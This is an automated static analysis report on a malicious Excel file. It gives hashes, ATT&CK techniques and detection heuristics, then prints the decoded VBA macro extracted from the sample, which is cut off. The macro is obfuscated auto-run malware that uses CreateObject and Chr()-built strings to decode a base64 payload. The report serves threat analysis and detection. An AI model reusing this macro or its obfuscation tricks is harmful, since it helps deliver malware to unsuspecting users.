Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1bbbe6b361084cdd…

MALICIOUS

Office (OLE)

57.0 KB Created: 2018-09-13 00:50:06 Authoring application: Microsoft Excel First seen: 2019-05-16
MD5: b279d2a01d5d056abd65a3455ba2dd01 SHA-1: 8a449403860b96baf5dcdf2d2c09d6e641043552 SHA-256: 1bbbe6b361084cdd0f88d69aa1ab51032debb22c37c442334e3d51dc56289854
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro. This macro is heavily obfuscated and uses a CreateObject call, indicating it likely attempts to download and execute a second-stage payload. The presence of a Workbook_Open auto-execution event and obfuscated code strongly suggests a malicious intent, likely delivered via spearphishing.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13543 bytes
SHA-256: 88441f0e41b0bc9f29ba954cd8f4dd730f85e132d99bd1c818e1af3c100f7cea
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
teNuAhp3wr.cuBOTk_Bt_x2GWUYaWU3
While 24 = 55
Dim Im_cG_ISHbm As Boolean
Wend
Dim EgHaMKDt_VOkvvS As Worksheet
While 17 = 52
Dim s_dplcV5yt As Boolean
Wend
Dim hGSZt2QZ6ui As Worksheet
While 27 = 50
Dim N3KOSk2vWWqT As Boolean
Wend
Dim pZSnvAWslRpoC As Worksheet
While 13 = 56
Dim sRNc8Iy_scE As Boolean
Wend
Dim QZQ1cGaU1vm9ZM As Worksheet

While 6 = 41
Dim eYhB75LfKiRl As Boolean
Wend
Dim RYM1T67LUTrfNc As Worksheet
While 27 = 43
Dim SwOERxObsO8v As Boolean
Wend
Dim g3uMrhzyBG9ap As Worksheet
While 7 = 35
Dim BL1IqBvbD2r5c9x As Boolean
Wend
Dim B6cjUIXSjF As Worksheet
While 1 = 41
Dim XmxKxwYOjWRA As Boolean
Wend
Dim MJRc_BQNhBv_mW As Worksheet
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "teNuAhp3wr"
Dim bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW As String
Dim xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4 As String
Dim oOj4XP4_MRumrAtK83cCTwxXa1k951pRXwU1z7711xI77M1rGfQWAjk1ZKagn4IUkaN5n2U_6kJfmzZM931WiQQwJdYmeXK7nwUe95CNJPaXYDLjuMguCuvRHZsIbqdfXM1zd5NCzlLRz3W As String
Dim hrM7nA8eHbXIFdfWGLWUq_XmhigqQUYwL4GXAUdudqIotAqRjCBwfS_hRiWDbPLvCk6LUGUvqkz9ys2g2MFNRkP23i_a8YRMdVkHDd7bpOE4bAr As Integer

 Function fm3PBqDWyNp3GCsLnmaVJz5SgxtXVzsgZr3lqFOSIwcMRGIJxxGZJA4pr(Pg6Nj9uS4S6EKIPlmg4AUj2NqP1lfFY_Idqnk_bVW5slXVS6UPKCYifooqfRGGvv355palAl_glY1NzT65PN5Uii8A84cHMNG6rbZlcsOh827E)
While 1 = 37
Dim jeVsn5Iy1WX1DL As Boolean
Wend
Dim jWUPExqzdjz15 As Worksheet
While 12 = 42
Dim YGoCzJS7RDpUZS As Boolean
Wend
Dim ggpTdCuMB_NLB9 As Worksheet
While 12 = 56
Dim tAu2v_tqKThosNQ As Boolean
Wend
Dim So5ndHQxOUw As Worksheet

 Dim Io6v_1ltcjQ_21sh2LWTOKG_Pdt5QHXQhjNXam_QjBjUjtFLe4KWfqN7f1djEpaSJ_eQlSEMGEsLkucfVfYW7At1UQ1iGdK4jPJjNxjJw7OZ7ATuW8LhOCVHNm6TbfEl4ykTj2
While 16 = 37
Dim IK_nwlHTKQQwhZ As Boolean
Wend
Dim izUTuxSe5qSSh As Worksheet
While 24 = 47
Dim gyaKef9yhk As Boolean
Wend
Dim ff6eWC_B2VL5R6 As Worksheet
While 7 = 50
Dim bcfcnOVTcCkes_u As Boolean
Wend
Dim OhkANyxxQ5 As Worksheet


   Dim WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd
While 3 = 55
Dim b4oa6TkferA9 As Boolean
Wend
Dim eJQMKC342R4Okwk As Worksheet
While 21 = 49
Dim DEnnMgKUq2fq9 As Boolean
Wend
Dim MVsPCYr_mt As Worksheet
While 7 = 49
Dim WCH9XzHsqbYC As Boolean
Wend
Dim Vt796fReJ53_ As Worksheet
   
While 5 = 31
Dim gfSsJJCa3rzdBUQ As Boolean
Wend
Dim BW8PewRVe_ZvcTN As Worksheet
While 4 = 37
Dim tbHDa2eXhfX As Boolean
Wend
Dim Hm4b6jMPFKmVPN As Worksheet
While 18 = 48
Dim HxnsWiFn8W As Boolean
Wend
Dim T73Xe9YtFzHsjk As Worksheet
 Set WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd = CreateObject(xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4)
While 27 = 55
Dim cKNCFhxuwLsptx As Boolean
Wend
Dim GxydnfF9pxtGv3 As Worksheet
While 26 = 59
Dim OY_XLBNKTDfY As Boolean
Wend
Dim hiHpoyNjkQAn As Worksheet
While 12 = 49
Dim DDddeYQ9u5eW As Boolean
Wend
Dim FSbqi6ct8N7gy As Worksheet
   bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW = Chr(369 - 271) & Chr(295 - 190) & Chr(307 - 197) & Chr(246 - 200) & Chr(452 - 354) & Chr(404 - 307) & Chr(424 - 309) & Chr(261 - 160) & Chr(73 - 19) & Chr(179 - 127)
While 1 = 59
Dim G53KP7XZTGgto4u As Boolean
Wend
Dim fmmDuhUUf_o
... (truncated)